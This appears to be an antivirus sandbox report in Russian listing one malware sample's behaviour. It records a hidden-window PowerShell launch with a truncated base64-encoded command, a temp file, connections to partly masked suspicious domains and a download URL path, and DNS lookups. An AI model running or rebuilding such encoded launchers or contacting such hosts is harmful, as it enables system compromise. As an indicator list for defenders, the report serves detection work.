Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEIAQQBBAEcAXwBBACAAPQAgACcANgA1ADkAJwA7ACQAdgBrAEIAQQBBAGMAQQBEAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAQQBBADQAYwAnACwAJwA0ADEAJwAsACcAUQAnACkAOwAkAEcAVQBVAG8AQQB4AFEAPQAkAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\911732.cvr
- 'pe####nlarousse.ir':80
- 'xc###ive.store':443
- http://pe####nlarousse.ir/apn/z_c/
- 'xc###ive.store':443
- DNS ASK ag###max.xyz
- DNS ASK tc####2000.com.br
- DNS ASK ou#####ndcreations.ca
- DNS ASK pe####nlarousse.ir
- DNS ASK xc###ive.store
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEIAQQBBAEcAXwBBACAAPQAgACcANgA1ADkAJwA7ACQAdgBrAEIAQQBBAGMAQQBEAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAQQBBADQAYwAnACwAJwA0ADEAJwAsACcAUQAnACkAOwAkAEcAVQBVAG8AQQB4AFEAPQAkAG...' (со скрытым окном)